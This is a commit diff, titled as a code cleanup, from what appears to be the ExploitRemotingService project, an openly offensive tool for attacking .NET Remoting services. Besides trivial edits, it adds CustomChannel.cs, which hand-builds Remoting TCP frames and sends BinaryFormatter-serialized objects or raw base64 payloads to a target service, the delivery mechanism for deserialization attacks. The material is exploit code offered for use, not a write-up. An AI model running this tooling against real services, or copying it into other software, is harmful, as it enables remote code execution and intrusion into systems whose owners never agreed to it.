Cleaning up code.

Author: tyranid

ExampleRemotingService/Program.cs

@@ -38,7 +38,7 @@ static void Main(string[] args)
             {
                 bool secure = false;
                 int port = 12345;
-                string ipc = String.Empty;
+                string ipc = string.Empty;
                 bool showhelp = false;
                 TypeFilterLevel typefilter = TypeFilterLevel.Low;
                 CustomErrorsModes custom_errors = CustomErrorsModes.Off;

ExploitRemotingService/CustomChannel.cs

@@ -0,0 +1,262 @@
+//    ExploitRemotingService
+//    Copyright (C) 2019 James Forshaw
+//
+//    This program is free software: you can redistribute it and/or modify
+//    it under the terms of the GNU General Public License as published by
+//    the Free Software Foundation, either version 3 of the License, or
+//    (at your option) any later version.
+//
+//    This program is distributed in the hope that it will be useful,
+//    but WITHOUT ANY WARRANTY; without even the implied warranty of
+//    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+//    GNU General Public License for more details.
+//
+//    You should have received a copy of the GNU General Public License
+//    along with this program.  If not, see <http://www.gnu.org/licenses/>.
+
+using System;
+using System.Diagnostics;
+using System.IO;
+using System.Linq;
+using System.Reflection;
+using System.Runtime.Remoting.Messaging;
+using System.Runtime.Serialization.Formatters;
+using System.Runtime.Serialization.Formatters.Binary;
+using System.Text;
+
+namespace ExploitRemotingService
+{
+    class CustomChannel
+    {
+        private Uri _uri;
+        private readonly Func<Stream> _bind_stream;
+        private readonly bool _null_uri;
+        private readonly Func<string, MethodBase, object[], object> _get_message_object;
+
+        public CustomChannel(Uri uri, Func<Stream> bind_stream, 
+            Func<string, MethodBase, object[], object> get_message_object, bool null_uri)
+        {
+            _uri = uri;
+            _bind_stream = bind_stream;
+            _null_uri = null_uri;
+            _get_message_object = get_message_object;
+        }
+
+        private static string ReadHeaderString(BinaryReader reader)
+        {
+            int encType = reader.ReadByte();
+            int length = reader.ReadInt32();
+
+            byte[] data = reader.ReadBytes(length);
+
+            if (encType == 0)
+            {
+                return Encoding.Unicode.GetString(data);
+            }
+            else if (encType == 1)
+            {
+                return Encoding.UTF8.GetString(data);
+            }
+            else
+            {
+                throw new InvalidOperationException("Invalid string encoding");
+            }
+        }
+
+        private static void ReadHeaders(BinaryReader reader)
+        {
+            ushort token = reader.ReadUInt16();
+
+            while (token != 0)
+            {
+                string name = token.ToString();
+                object value = null;
+
+                switch (token)
+                {
+                    case 1:
+                        {
+                            name = ReadHeaderString(reader);
+                            value = ReadHeaderString(reader);
+                        }
+                        break;
+                    default:
+                        byte dataType = reader.ReadByte();
+
+                        switch (dataType)
+                        {
+                            case 0:
+                                break;
+                            case 1:
+                                value = ReadHeaderString(reader);
+                                break;
+                            case 2:
+                                value = reader.ReadByte();
+                                break;
+                            case 3:
+                                value = reader.ReadUInt16();
+                                break;
+                            case 4:
+                                value = reader.ReadInt32();
+                                break;
+                            default:
+                                throw new InvalidOperationException("Unknown header data type");
+                        }
+                        break;
+                }
+
+                Trace.WriteLine($"Header: {name}={value}");
+                token = reader.ReadUInt16();
+            }
+        }
+
+        private static object ParseResult(BinaryReader reader)
+        {
+            uint magic = reader.ReadUInt32();
+
+            if (magic != 0x54454E2E)
+            {
+                throw new InvalidDataException("Invalid magic value");
+            }
+
+            reader.ReadByte(); // Major
+            reader.ReadByte(); // Minor
+            reader.ReadUInt16(); // Operation Type
+            reader.ReadUInt16(); // Content distribution
+
+            int len = reader.ReadInt32();
+
+            ReadHeaders(reader);
+
+            byte[] data = reader.ReadBytes(len);
+
+            BinaryFormatter fmt = new BinaryFormatter
+            {
+                AssemblyFormat = FormatterAssemblyStyle.Simple
+            };
+
+            MemoryStream stm = new MemoryStream(data);
+            if (fmt.Deserialize(stm) is IMethodReturnMessage ret)
+            {
+                if (ret.Exception != null)
+                {
+                    return ret.Exception;
+                }
+                else
+                {
+                    return ret.ReturnValue ?? "void";
+                }
+            }
+            else
+            {
+                return "Error, invalid return message.";
+            }
+        }
+
+        private static MethodBase GetStaticMethod(Type type, string name, params Type[] argTypes)
+        {
+            MethodBase b = type.GetMethod(name, BindingFlags.Static | BindingFlags.Public, 
+                null, argTypes, null);
+
+            if (b == null)
+            {
+                throw new InvalidOperationException($"Could not get method {name} with types {string.Join(",", argTypes.Select(t => t.FullName).ToArray())}");
+            }
+
+            return b;
+        }
+
+        public static byte[] SerializeObject(object o, bool remote)
+        {
+            MemoryStream stm = new MemoryStream();
+            BinaryFormatter fmt = new BinaryFormatter
+            {
+                AssemblyFormat = FormatterAssemblyStyle.Simple
+            };
+
+            if (remote)
+            {
+                fmt.SurrogateSelector = new RemotingSurrogateSelector();
+            }
+
+            fmt.Serialize(stm, o);
+
+            return stm.ToArray();
+        }
+
+        public object SendRequest(byte[] data)
+        {
+            MemoryStream stm = new MemoryStream();
+            BinaryWriter writer = new BinaryWriter(stm);
+
+            writer.Write((uint)0x54454E2E); // Header
+            writer.Write((byte)1); // Major
+            writer.Write((byte)0); // Minor
+            writer.Write((ushort)0); // OperationType
+            writer.Write((ushort)0); // ContentDistribution
+            writer.Write(data.Length); // Data Length
+
+            if (!_null_uri)
+            {
+                writer.Write((ushort)4); // UriHeader
+                writer.Write((byte)1); // DataType
+                writer.Write((byte)1); // Encoding: UTF8
+
+                byte[] uriData = Encoding.UTF8.GetBytes(_uri.ToString());
+
+                writer.Write(uriData.Length); // Length
+                writer.Write(uriData); // URI
+            }
+
+            writer.Write((ushort)0); // Terminating Header
+            writer.Write(data); // Data
+
+            using (var netStream = _bind_stream())
+            {
+                using (var netWriter = new BinaryWriter(netStream))
+                {
+                    netWriter.Write(stm.ToArray());
+
+                    BinaryReader reader = new BinaryReader(netStream);
+
+                    return ParseResult(reader);
+                }
+            }
+        }
+
+        public object SendRequest(string base64)
+        {
+            return SendRequest(Convert.FromBase64String(base64));
+        }
+
+        public object SendRequest(object o, bool remote)
+        {
+            byte[] data = SerializeObject(o, remote);
+            return SendRequest(data);
+        }
+
+        public T MakeCall<T>(string path, MethodBase mi, params object[] cmdargs)
+        {
+            return (T)MakeCall(path, mi, cmdargs);
+        }
+
+        public object MakeCall(string path, MethodBase mi, params object[] cmdargs)
+        {
+            object ret = SendRequest(_get_message_object(path, mi, cmdargs), false);
+
+            if (ret is Exception)
+            {
+                throw (Exception)ret;
+            }
+            else
+            {
+                return ret;
+            }
+        }
+
+        public object MakeCallNoThrow(string path, MethodBase mi, params object[] cmdargs)
+        {
+            return SendRequest(_get_message_object(path, mi, cmdargs), false);
+        }
+    }
+}

ExploitRemotingService/ExploitRemotingService.csproj

@@ -70,7 +70,9 @@
     <Reference Include="System.Xml" />
   </ItemGroup>
   <ItemGroup>
+    <Compile Include="CustomChannel.cs" />
     <Compile Include="SerializableWrapper.cs" />
+    <Compile Include="SerializerRemoteClass.cs" />
     <EmbeddedResource Include="..\Installer\InstallClass.cs">
       <Link>InstallClass.cs</Link>
     </EmbeddedResource>

ExploitRemotingService/FakeMessage.cs

@@ -123,8 +123,6 @@ public LogicalCallContext LogicalCallContext
             }
         }
 
-        //private int count = 0;
-
         private static void TraceMethodCall(MethodBase mi)
         {
             Trace.WriteLine(String.Format("Calling: {0}", mi.Name));